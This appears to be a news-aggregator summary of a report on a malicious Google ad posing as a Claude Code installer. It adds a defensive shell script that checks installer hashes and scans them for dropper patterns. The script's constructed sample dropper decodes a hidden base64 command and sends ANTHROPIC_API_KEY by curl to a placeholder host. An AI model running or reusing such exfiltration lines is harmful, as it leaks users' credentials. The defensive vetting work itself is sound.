Malicious Google Ad Targets Claude Code Installation

Malicious Google Result for Claude Code Installation
A security researcher discovered a malicious Google ad appearing as the top result for searches related to installing Claude Code. The ad targets users searching for "install claude code" and presents suspicious terminal commands that could compromise systems.
What Happened
The author, setting up a new MacBook, searched Google for "install claude code" and clicked the first result. Without uBlock installed, they landed on an ad whose page prompted them to copy and paste terminal commands. Recognizing that something was off, they stopped the command before it ran.
The author notes that this is particularly dangerous because many users new to AI tools have limited CLI experience and are unlikely to recognize a malicious command, especially when the vendor's own documented install path is also a copy-and-paste one-liner. The ad was still active as of March 15, 2026, at 12:17 UTC.
Security Implications
According to the post, a script delivered this way could:
- Compromise the machine it is run on
- Steal Anthropic API keys (the author suggests these may be worth more to an attacker than mining Bitcoin on the victim's hardware)
- Land on exactly the users least able to spot it: people who install tooling by pasting a one-line command from a search result and have no way to judge what it does
The author provided a VirusTotal link for the suspicious file: https://www.virustotal.com/gui/file/853c4b09cc8e4efb90f42f9bc81e1f7adb6fdc1a766e4abaf933b7aaee9657fa (the 64-character identifier in the URL is the file's SHA-256, which you can compare against the hash of anything you downloaded).
Broader Context
This incident highlights the risk of treating a search result as a trustworthy source for software installation, especially for fast-moving AI developer tools where most users have never seen the genuine installer. Sponsored results sit above the vendor's real page and can present an arbitrary command. Practical defences: run an ad blocker, navigate to the vendor's own documentation rather than the top search hit, never pipe a fetched script straight into a shell, and when an install really is a one-liner, save the script to a file, read it, and check its hash before running it.
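The following is an added example written for this page; it is not code from the HN post, from Anthropic, or from any real installer. It shows the "download, pin, inspect" habit described above: instead of pasting `curl ... | sh`, the installer is saved to a file, its SHA-256 is compared against a pinned value (such as the one in a VirusTotal URL, or the hash the vendor publishes), and the file is scanned for patterns typical of copy-paste droppers before anything executes. The pattern list and both sample installers are constructed for the demo and are assumptions of the example, not indicators taken from the actual ad.

```shell
#!/bin/sh
# Added example (not from the original post). Vet a downloaded installer
# instead of piping a search-result one-liner straight into a shell.
# vet_installer exit codes: 0 clean, 1 hash mismatch, 2 suspicious content.

sha256_of() {
  # macOS ships shasum, most Linux distros ship sha256sum; support both.
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  else
    shasum -a 256 "$1" | awk '{print $1}'
  fi
}

# Hypothetical pattern list (an assumption of this example; tune it):
# decoding hidden payloads, executing fetched text, fetch-and-pipe-to-shell,
# persistence locations, and the API key the HN author expects such ads to be after.
SUSPICIOUS='base64[[:space:]]+(-d|-D|--decode)|eval[[:space:]]|(curl|wget)[^|]*[|][[:space:]]*(ba|z)?sh|ANTHROPIC_API_KEY|LaunchAgents|crontab'

# vet_installer FILE [EXPECTED_SHA256]
vet_installer() {
  local file expected actual
  file="$1"
  expected="${2:-}"
  actual="$(sha256_of "$file")"
  if [ -n "$expected" ] && [ "$actual" != "$expected" ]; then
    echo "REJECT: sha256 mismatch (expected $expected, got $actual)" >&2
    return 1
  fi
  if grep -Eq "$SUSPICIOUS" "$file"; then
    echo "REJECT: suspicious lines in $file:" >&2
    grep -En "$SUSPICIOUS" "$file" >&2
    return 2
  fi
  echo "OK: $file sha256=$actual (still read it before you run it)" >&2
  return 0
}

# Constructed sample installers for the demo; neither is a real script.
# good.sh is a plain installer, bad.sh mimics a dropper that decodes a hidden
# command and tries to exfiltrate an API key to a reserved example domain.
write_samples() {
  local dir
  dir="$1"
  cat > "$dir/good.sh" <<'EOF'
#!/bin/sh
set -e
echo "installing example-cli into $HOME/.local/bin"
mkdir -p "$HOME/.local/bin"
EOF
  cat > "$dir/bad.sh" <<'EOF'
#!/bin/sh
echo "Installing Claude Code..."
eval "$(echo 'ZWNobyBwYXlsb2Fk' | base64 -d)"
printf '%s' "$ANTHROPIC_API_KEY" | curl -s -d @- http://example.invalid/collect
EOF
}

demo_vet() {
  local dir good_hash
  dir="$(mktemp -d)"
  write_samples "$dir"
  good_hash="$(sha256_of "$dir/good.sh")"
  vet_installer "$dir/good.sh" "$good_hash" || echo "good.sh unexpectedly rejected: $?"
  vet_installer "$dir/bad.sh" || echo "bad.sh rejected with status $?"
  vet_installer "$dir/good.sh" 0000 || echo "good.sh with wrong pin rejected with status $?"
  rm -rf "$dir"
}

demo_vet
```

Run it as `sh vet.sh`: the clean sample passes when its pinned hash matches, the dropper-like sample is rejected with the offending lines printed to stderr, and a wrong pin is rejected before content is even inspected. The hash check stops a swapped file; the pattern scan is only a tripwire for the obvious tricks, so the final line of defence is still reading the script.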
📖 Read the full source: HN AI Agents
👀 See Also

Secure Administrator Approval Flow for Group-Chat Assistants Against Prompt Injection
A practical approach to secure LLM assistants in shared group chats: pausing VM, OAuth, and code execution tools until admin approves via a timed link.

Critical RCE vulnerability in protobuf.js library
A critical remote code execution vulnerability in protobuf.js (versions 8.0.0 and earlier, and 7.5.4 and earlier) allows JavaScript code execution through malicious schemas. Patches are available in versions 8.0.1 and 7.5.5.

Wide OpenClaw: Security Risks from Loose Discord Bot Permissions
A security researcher demonstrates how OpenClaw can be exploited when users add the AI assistant bot to their Discord server with excessive permissions, targeting users who grant root/admin access without considering security controls.

FastCGI: 30 Years Old and Still the Better Protocol for Reverse Proxies
FastCGI avoids HTTP desync attacks and untrusted header issues by using explicit message framing and separate parameter channels, making it a safer choice for proxy-to-backend communication.